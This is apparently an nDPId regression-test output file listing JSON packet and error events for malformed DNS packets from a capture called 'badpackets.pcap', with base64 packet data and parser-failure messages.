01865{"packet_event_id":1,"packet_event_name":"packet","packet_id":14,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1kgADURSH+MrBHtzLpQ5QA18VcKSC9N\/PmEEAABAAIABAANC2Zsb29kc2FmZXR5BG5vYWEDZ292AAABAAHADAABAAEAAAEsAASMWnHIwAwALgABAAABLAEcAAEFAwAAASxZK4t9WSJQ\/T5zBG5vYWEDZ292AI8NxE24xoB5Eg9dMdW2i2Wbnp7WAjJSEPfx6q6WNvQlvElWxcN5ImSIEBkCrx36XB+4y7FQRSHAcJfGmrEujeIG4vm2iak4\/iZ8q6dmad9UZqsYw7xMfUiMET9ynUM9tfbf26FoVrC7jqPoXd\/CLZ2MXGmkMAEGsqydhYm\/5Owhr1bdMagm+9i4eFaCOhOwLA5ytPfBpqddYO4P6KxfzWofdME7xL026plG7g0aOG4GcHKq2yCkGN\/td2KW3STw7Yn3EkgDcCQ9GkTH0mNpchsIxkxjSxGtSeHI3BNNToabK8Bt8I+qEmB2t+Dviv1HzjwGjXetcCij9X+FGH0VoGjAVAACAAEAAVGAAAgFbnMtbXfAVMBUAAIAAQABUYAACAVucy1ud8BUwFQAAgABAAFRgAAHBG5zLWXAVMBUAC4AAQABUYABHAACBQIAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgB\/\/xDOV8RlACc0tJNxS+YKsLSQOBQbk6NLsQZG3YDTjO3iKsh7IcLqiw6uOc7SaLs86m+f\/kMHQskW6EQOmEHDMnbqN9IQMGQT4wsBbRrQmwjtM3XaVIfw2QRYEj4dnRSam\/XPSboR6M9\/hOGPVESZ\/uQ6WqFzbJ5fPUcerIlG\/kYoZuwvlZN9eWpmI2uvZVEJoNzzXHVFVxe+gyzQ2fX9CfzbU64wrazKsV4840AxDn9S8jSgjT7wrA1fAbUY1N1Z18MDcPXwCsgNM45SCTA3GR4LZG5q0wfZhRsvLTMW6nxaQfuphvLWLR4kFiw6usfYhcbxye3Gh4WdZwsuqUy1wZIAAQABAAFRgAAEjFoh7cGSABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBagABAAEAAVGAAASMrBHtwWoAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8F+AAEAAQABUYAABKE3IALBfgAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwZIALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBkgAuAAEAAVGAAQ=="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":14,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1152,"global_ts_msec":1495451114040} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":14,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1152,"global_ts_msec":1495451114040}
01885{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":15,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1193,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1ogADURSH6MrBHtzLpQ5QA13wAKT4pfTrqEEAABAAIABAANA3ZsYgRuY2RjBG5vYWEDZ292AAABAAHADAABAAEAAA4QAATNpxlkwAwALgABAAAOEAEhAAEFBAAADhBZKcVTWSCK0x9HBG5jZGMEbm9hYQNnb3YAX+ROMTDmu2LvY14SfjFGvi3WEW6+STJjZDx4ISbi+8Up66dG\/bw1go3rWtgRYv32inrUxVD+E4qN4O65GyWgncqxzNBHyqogKfZU9dx9y+PqIoQ+ar6wCBaZMeRlZ2H\/KAZm9VZJdIYSfT7rg8tylzg1ByKUx\/dM58k4tzq01zWfvvdDqlgyS\/7dfwH3Cx0Q3tKk8RttgwJo0iMxQWM\/AbIcQHtWikYNLoiBlgpKokdUg9fvMXVaU6C7Dli78cCopcGhFjDJKTKGsg8VZwPKF9jhIvdYxA+Q0I24PRjdqFWpLctR\/ZrlwtAdX59WvQRCsyLHS7xFl+DxalLuB\/SgjMBRAAIAAQABUYAABwRucy1lwFbAUQACAAEAAVGAAAgFbnMtbXfAVsBRAAIAAQABUYAACAVucy1ud8BWwFEALgABAAFRgAEhAAIFAwABUYBZKcVTWSCK0x9HBG5jZGMEbm9hYQNnb3YAmWRe9VtNaGu5X49TFlABbU\/pql1LRAtlNRRYPZA76YNivdumGQu4wVgBmCm+hYA4u\/HWo\/sXy+OjhkGg69foZAZZApULWjIwIoUuPmRWXN7SuPsCbcxc2lz03QGkeHWcv53g7lGYu11y+pQHMJSB5g8OgwFH1IpZebWevGbH01CETWP8X15qQ1Si4Mg+CLVxJUTEjQ+X3iu+vEJrye6jYg4+V8n1uXRhP1XaMIy9guTSW+vZMz5uu3LssrCEsl8FV2QPvYCNY6ShsKFc9MUOedVXQ3fLqRmhLx+5ICURO9pKmtWRUtZLxMAKiuJMWwbJBHU0oQ\/4Oz18pihCuPdUXcFsAAEAAQABUYAABIxaIe3BbAAcAAEAAVGAABAmEAAggACMAAAAAAAAAAI3wX8AAQABAAFRgAAEjKwR7cF\/ABwAAQABUYAAECYQACCIAIwAAAAAAAAAAjfBkwABAAEAAVGAAAShNyACwZMAHAABAAFRgAAQJhAAIIwAjAAAAAAAAAAAAsFsAC4AAQABUYABHAABBQMAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgAdPG7ehO6IW4WIIulOX8wrz0E30kEaN8pVRkAXeBkIqEzDHfgYVK0sdZ5efJzSOnPqgHdQqhZhaojOXm4uaRNV0BM7TnAaFGReahEW+oclDj1FD6kFM2+O9+xmO3izFYVoFfp1wzvVgLlshXbzWEUiyetInv1BKKFIEeJ5LL23lhMaUXksImKM0RYQcljEMgPUzNr61cp01clYduRCFDBE8koZf3WOqAU+XPiGZ+N7vs+u0ppQnyHl4Ckwf6Bo1ew0W\/NXecH7qQZVe\/ZVZVdU9cjdfMwVrwIodtisUZ3ssnh\/k8UHvbkkIHFNDgp4Q64ETRZdWoT1WgrW5igHg8ArwWwALgABAAFRgAE="} 01871{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1193,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW1ogADURSH6MrBHtzLpQ5QA13wAKT4pfTrqEEAABAAIABAANA3ZsYgRuY2RjBG5vYWEDZ292AAABAAHADAABAAEAAA4QAATNpxlkwAwALgABAAAOEAEhAAEFBAAADhBZKcVTWSCK0x9HBG5jZGMEbm9hYQNnb3YAX+ROMTDmu2LvY14SfjFGvi3WEW6+STJjZDx4ISbi+8Up66dG\/bw1go3rWtgRYv32inrUxVD+E4qN4O65GyWgncqxzNBHyqogKfZU9dx9y+PqIoQ+ar6wCBaZMeRlZ2H\/KAZm9VZJdIYSfT7rg8tylzg1ByKUx\/dM58k4tzq01zWfvvdDqlgyS\/7dfwH3Cx0Q3tKk8RttgwJo0iMxQWM\/AbIcQHtWikYNLoiBlgpKokdUg9fvMXVaU6C7Dli78cCopcGhFjDJKTKGsg8VZwPKF9jhIvdYxA+Q0I24PRjdqFWpLctR\/ZrlwtAdX59WvQRCsyLHS7xFl+DxalLuB\/SgjMBRAAIAAQABUYAABwRucy1lwFbAUQACAAEAAVGAAAgFbnMtbXfAVsBRAAIAAQABUYAACAVucy1ud8BWwFEALgABAAFRgAEhAAIFAwABUYBZKcVTWSCK0x9HBG5jZGMEbm9hYQNnb3YAmWRe9VtNaGu5X49TFlABbU\/pql1LRAtlNRRYPZA76YNivdumGQu4wVgBmCm+hYA4u\/HWo\/sXy+OjhkGg69foZAZZApULWjIwIoUuPmRWXN7SuPsCbcxc2lz03QGkeHWcv53g7lGYu11y+pQHMJSB5g8OgwFH1IpZebWevGbH01CETWP8X15qQ1Si4Mg+CLVxJUTEjQ+X3iu+vEJrye6jYg4+V8n1uXRhP1XaMIy9guTSW+vZMz5uu3LssrCEsl8FV2QPvYCNY6ShsKFc9MUOedVXQ3fLqRmhLx+5ICURO9pKmtWRUtZLxMAKiuJMWwbJBHU0oQ\/4Oz18pihCuPdUXcFsAAEAAQABUYAABIxaIe3BbAAcAAEAAVGAABAmEAAggACMAAAAAAAAAAI3wX8AAQABAAFRgAAEjKwR7cF\/ABwAAQABUYAAECYQACCIAIwAAAAAAAAAAjfBkwABAAEAAVGAAAShNyACwZMAHAABAAFRgAAQJhAAIIwAjAAAAAAAAAAAAsFsAC4AAQABUYABHAABBQMAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgAdPG7ehO6IW4WIIulOX8wrz0E30kEaN8pVRkAXeBkIqEzDHfgYVK0sdZ5efJzSOnPqgHdQqhZhaojOXm4uaRNV0BM7TnAaFGReahEW+oclDj1FD6kFM2+O9+xmO3izFYVoFfp1wzvVgLlshXbzWEUiyetInv1BKKFIEeJ5LL23lhMaUXksImKM0RYQcljEMgPUzNr61cp01clYduRCFDBE8koZf3WOqAU+XPiGZ+N7vs+u0ppQnyHl4Ckwf6Bo1ew0W\/NXecH7qQZVe\/ZVZVdU9cjdfMwVrwIodtisUZ3ssnh\/k8UHvbkkIHFNDgp4Q64ETRZdWoT1WgrW5igHg8ArwWwALgABAAFRgAE="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":15,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1159,"global_ts_msec":1495451114042} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":15,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1159,"global_ts_msec":1495451114042}
00516{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":16,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW14gADURSHqMrBHtzLpQ5QA1cdYMIeseCHyEEAABAA0ABAANCGVkZ2UtbndzA3dvYwRub2FhA2dvdgAAAQABwAwABQABAAABLAAMB2VkZ2UtcDEBbMAZwAwALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgCQTrqAqFPUlwzaSBYq8hc48+OOYcX3TV6bWxXaYm8="} 00502{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW14gADURSHqMrBHtzLpQ5QA1cdYMIeseCHyEEAABAA0ABAANCGVkZ2UtbndzA3dvYwRub2FhA2dvdgAAAQABwAwABQABAAABLAAMB2VkZ2UtcDEBbMAZwAwALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgCQTrqAqFPUlwzaSBYq8hc48+OOYcX3TV6bWxXaYm8="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":16,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1495451114337} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":16,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1495451114337}
00517{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":17,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAogADIR1C2hNyACzLpQ5QA1Q\/EMIbPPgtyEEAABAA0ABAANCGVkZ2UtbndzA3dvYwRub2FhA2dvdgAAAQABwAwABQABAAABLAAMB2VkZ2UtcDEBbMAZwAwALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgCQTrqAqFPUlwzaSBYq8hc48+OOYcX3TV6bWxXaYm8="} 00503{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsAogADIR1C2hNyACzLpQ5QA1Q\/EMIbPPgtyEEAABAA0ABAANCGVkZ2UtbndzA3dvYwRub2FhA2dvdgAAAQABwAwABQABAAABLAAMB2VkZ2UtcDEBbMAZwAwALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgCQTrqAqFPUlwzaSBYq8hc48+OOYcX3TV6bWxXaYm8="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":17,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1495451114364} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":17,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1495451114364}
01879{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":18,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1190,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsA0gADIR1CqhNyACzLpQ5QA1Q5YKTHldtTaEEAABAAIABAANA3d3dwtyaXBjdXJyZW50cwRub2FhA2dvdgAAAQABwAwAAQABAAABLAAEjFpxyMAMAC4AAQAAASwBHAABBQQAAAEsWSuLfVkiUP0+cwRub2FhA2dvdgBux3u1kqhoa2542f5VfZyNoS158qaQHxQC5yl\/X1HYHlN9OKFD2TTtS4MZKS2ZLbvQB5eqC\/5Riya4tMHEv+9kjK+XtBF7Rj7yVxMulYYVKJY1yrzk9A\/DMfiIWTmC3qviPxuqYkAT5W+fAOD4Nsy\/5JE6hIu89v+rqG\/Z8kfURtGsfsnMCQfSTMP2AXbh6JHaVQaDQaVNy0gDeBqDP1Owy3kJn4t100KGsy2p4xGQ0JUhkDuTy2t3fY6FBUSyoy0avo4Kb7JFJHys5VrqR44WISsO3GrLnTJtfVwBE9Pr\/BpNps2Jko7Ht0KLwUiDWgVCGdLvJTwQLCElPL9pPjkswFgAAgABAAFRgAAHBG5zLWXAWMBYAAIAAQABUYAACAVucy1ud8BYwFgAAgABAAFRgAAIBW5zLW13wFjAWAAuAAEAAVGAARwAAgUCAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAf\/8QzlfEZQAnNLSTcUvmCrC0kDgUG5OjS7EGRt2A04zt4irIeyHC6osOrjnO0mi7POpvn\/5DB0LJFuhEDphBwzJ26jfSEDBkE+MLAW0a0JsI7TN12lSH8NkEWBI+HZ0Umpv1z0m6EejPf4Thj1REmf7kOlqhc2yeXz1HHqyJRv5GKGbsL5WTfXlqZiNrr2VRCaDc81x1RVcXvoMs0Nn1\/Qn821OuMK2syrFePONAMQ5\/UvI0oI0+8KwNXwG1GNTdWdfDA3D18ArIDTOOUgkwNxkeC2RuatMH2YUbLy0zFup8WkH7qYby1i0eJBYsOrrH2IXG8cntxoeFnWcLLqlMtcFuAAEAAQABUYAABIxaIe3BbgAcAAEAAVGAABAmEAAggACMAAAAAAAAAAI3wZUAAQABAAFRgAAEjKwR7cGVABwAAQABUYAAECYQACCIAIwAAAAAAAAAAjfBgQABAAEAAVGAAAShNyACwYEAHAABAAFRgAAQJhAAIIwAjAAAAAAAAAAAAsFuAC4AAQABUYABHAABBQMAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgAdPG7ehO6IW4WIIulOX8wrz0E30kEaN8pVRkAXeBkIqEzDHfgYVK0sdZ5efJzSOnPqgHdQqhZhaojOXm4uaRNV0BM7TnAaFGReahEW+oclDj1FD6kFM2+O9+xmO3izFYVoFfp1wzvVgLlshXbzWEUiyetInv1BKKFIEeJ5LL23lhMaUXksImKM0RYQcljEMgPUzNr61cp01clYduRCFDBE8koZf3WOqAU+XPiGZ+N7vs+u0ppQnyHl4Ckwf6Bo1ew0W\/NXecH7qQZVe\/ZVZVdU9cjdfMwVrwIodtisUZ3ssnh\/k8UHvbkkIHFNDgp4Q64ETRZdWoT1WgrW5igHg8ArwW4ALgABAAFRgAE="} 01865{"packet_event_id":1,"packet_event_name":"packet","packet_id":18,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1190,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsA0gADIR1CqhNyACzLpQ5QA1Q5YKTHldtTaEEAABAAIABAANA3d3dwtyaXBjdXJyZW50cwRub2FhA2dvdgAAAQABwAwAAQABAAABLAAEjFpxyMAMAC4AAQAAASwBHAABBQQAAAEsWSuLfVkiUP0+cwRub2FhA2dvdgBux3u1kqhoa2542f5VfZyNoS158qaQHxQC5yl\/X1HYHlN9OKFD2TTtS4MZKS2ZLbvQB5eqC\/5Riya4tMHEv+9kjK+XtBF7Rj7yVxMulYYVKJY1yrzk9A\/DMfiIWTmC3qviPxuqYkAT5W+fAOD4Nsy\/5JE6hIu89v+rqG\/Z8kfURtGsfsnMCQfSTMP2AXbh6JHaVQaDQaVNy0gDeBqDP1Owy3kJn4t100KGsy2p4xGQ0JUhkDuTy2t3fY6FBUSyoy0avo4Kb7JFJHys5VrqR44WISsO3GrLnTJtfVwBE9Pr\/BpNps2Jko7Ht0KLwUiDWgVCGdLvJTwQLCElPL9pPjkswFgAAgABAAFRgAAHBG5zLWXAWMBYAAIAAQABUYAACAVucy1ud8BYwFgAAgABAAFRgAAIBW5zLW13wFjAWAAuAAEAAVGAARwAAgUCAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAf\/8QzlfEZQAnNLSTcUvmCrC0kDgUG5OjS7EGRt2A04zt4irIeyHC6osOrjnO0mi7POpvn\/5DB0LJFuhEDphBwzJ26jfSEDBkE+MLAW0a0JsI7TN12lSH8NkEWBI+HZ0Umpv1z0m6EejPf4Thj1REmf7kOlqhc2yeXz1HHqyJRv5GKGbsL5WTfXlqZiNrr2VRCaDc81x1RVcXvoMs0Nn1\/Qn821OuMK2syrFePONAMQ5\/UvI0oI0+8KwNXwG1GNTdWdfDA3D18ArIDTOOUgkwNxkeC2RuatMH2YUbLy0zFup8WkH7qYby1i0eJBYsOrrH2IXG8cntxoeFnWcLLqlMtcFuAAEAAQABUYAABIxaIe3BbgAcAAEAAVGAABAmEAAggACMAAAAAAAAAAI3wZUAAQABAAFRgAAEjKwR7cGVABwAAQABUYAAECYQACCIAIwAAAAAAAAAAjfBgQABAAEAAVGAAAShNyACwYEAHAABAAFRgAAQJhAAIIwAjAAAAAAAAAAAAsFuAC4AAQABUYABHAABBQMAAVGAWSuLfVkiUP0+cwRub2FhA2dvdgAdPG7ehO6IW4WIIulOX8wrz0E30kEaN8pVRkAXeBkIqEzDHfgYVK0sdZ5efJzSOnPqgHdQqhZhaojOXm4uaRNV0BM7TnAaFGReahEW+oclDj1FD6kFM2+O9+xmO3izFYVoFfp1wzvVgLlshXbzWEUiyetInv1BKKFIEeJ5LL23lhMaUXksImKM0RYQcljEMgPUzNr61cp01clYduRCFDBE8koZf3WOqAU+XPiGZ+N7vs+u0ppQnyHl4Ckwf6Bo1ew0W\/NXecH7qQZVe\/ZVZVdU9cjdfMwVrwIodtisUZ3ssnh\/k8UHvbkkIHFNDgp4Q64ETRZdWoT1WgrW5igHg8ArwW4ALgABAAFRgAE="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":18,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1156,"global_ts_msec":1495451114389} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":18,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1156,"global_ts_msec":1495451114389}
00516{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":19,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsA4gADIR1CmhNyACzLpQ5QA1XMQMIcjtVOuEEAABAA0ABAANCGVkZ2UtbndzA3dvYwRub2FhA2dvdgAAAQABwAwABQABAAABLAAMB2VkZ2UtcDEBbMAZwAwALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgCQTrqAqFPUlwzaSBYq8hc48+OOYcX3TV6bWxXaYm8="} 00502{"packet_event_id":1,"packet_event_name":"packet","packet_id":19,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsA4gADIR1CmhNyACzLpQ5QA1XMQMIcjtVOuEEAABAA0ABAANCGVkZ2UtbndzA3dvYwRub2FhA2dvdgAAAQABwAwABQABAAABLAAMB2VkZ2UtcDEBbMAZwAwALgABAAABLAEgAAUFBAAAASxZK4vIWSJRSL+OA3dvYwRub2FhA2dvdgCQTrqAqFPUlwzaSBYq8hc48+OOYcX3TV6bWxXaYm8="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":19,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1495451114409} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":19,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":145,"global_ts_msec":1495451114409}
00950{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":20,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2EgADURSHeMrBHtzLpQ5QA1hSENY4PPmWmEEAABAA8ABAANA3d3dwRnb2VzBG5vYWEDZ292AAABAAHADAAFAAEAAVGAABILZWRnZS1uZXNkaXMDd29jwBXADAAuAAEAAVGAARwABQUEAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAmB+rNTTf9y2fL9huXtwXacy3dpdAU\/FF66y0T2Abh4gJ4oqoROLCskJvvn3j9VXRYvVuHgr\/e97Co5990baGGvZb+DvhgSBtQA0XDhAbhT4IGku7L7hKoOqCPzJ2xMN4lERF15hNGRqg\/cT5v5CgilDGweZpWDYW20FvCYF4m8AGKWztxWEdpdH2c13sLamLNmDpbsiDeUYVinK+o0nUucS9JVb7qjOM60ITS257sC9GnrEJqXc7E0PqTUPhbrT8oM6CmNCpuj24P56BqqMr1XKbdWFuIo37YO1g0eKMEI09l2QWTwRGahH71x3X3yh\/Irc0cgLSM9Wcphsq4AONbsAvAAUAAQAAASwADAdlZGdlLXAxAWzAX8AvAC4AAQAAASwBIAAFBQQAAAEsWSuLyFkiUUi\/jgN3b2MEbm9hYQNnb3YAHVR1NQXRWlbpbPXbpQ4K7jGWLXOoK18x\/MZgCtt9"} 00936{"packet_event_id":1,"packet_event_name":"packet","packet_id":20,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2EgADURSHeMrBHtzLpQ5QA1hSENY4PPmWmEEAABAA8ABAANA3d3dwRnb2VzBG5vYWEDZ292AAABAAHADAAFAAEAAVGAABILZWRnZS1uZXNkaXMDd29jwBXADAAuAAEAAVGAARwABQUEAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAmB+rNTTf9y2fL9huXtwXacy3dpdAU\/FF66y0T2Abh4gJ4oqoROLCskJvvn3j9VXRYvVuHgr\/e97Co5990baGGvZb+DvhgSBtQA0XDhAbhT4IGku7L7hKoOqCPzJ2xMN4lERF15hNGRqg\/cT5v5CgilDGweZpWDYW20FvCYF4m8AGKWztxWEdpdH2c13sLamLNmDpbsiDeUYVinK+o0nUucS9JVb7qjOM60ITS257sC9GnrEJqXc7E0PqTUPhbrT8oM6CmNCpuj24P56BqqMr1XKbdWFuIo37YO1g0eKMEI09l2QWTwRGahH71x3X3yh\/Irc0cgLSM9Wcphsq4AONbsAvAAUAAQAAASwADAdlZGdlLXAxAWzAX8AvAC4AAQAAASwBIAAFBQQAAAEsWSuLyFkiUUi\/jgN3b2MEbm9hYQNnb3YAHVR1NQXRWlbpbPXbpQ4K7jGWLXOoK18x\/MZgCtt9"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":20,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":467,"global_ts_msec":1495451114477} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":20,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":467,"global_ts_msec":1495451114477}
00346{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":21,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2IgADURSHaMrBHtzLpQ5QA1ue4F2rYkIYyEEAABAAUAAA=="} 00332{"packet_event_id":1,"packet_event_name":"packet","packet_id":21,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2IgADURSHaMrBHtzLpQ5QA1ue4F2rYkIYyEEAABAAUAAA=="}
00246{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":21,"source":"badpackets.pcap","alias":"nDPId-test","size":52,"expected":60,"global_ts_msec":1495451114592} 00232{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":21,"source":"badpackets.pcap","alias":"nDPId-test","size":52,"expected":60,"global_ts_msec":1495451114592}
00346{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":21,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2IgADURSHaMrBHtzLpQ5QA1ue4F2rYkIYyEEAABAAUAAA=="} 00332{"packet_event_id":1,"packet_event_name":"packet","packet_id":21,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2IgADURSHaMrBHtzLpQ5QA1ue4F2rYkIYyEEAABAAUAAA=="}
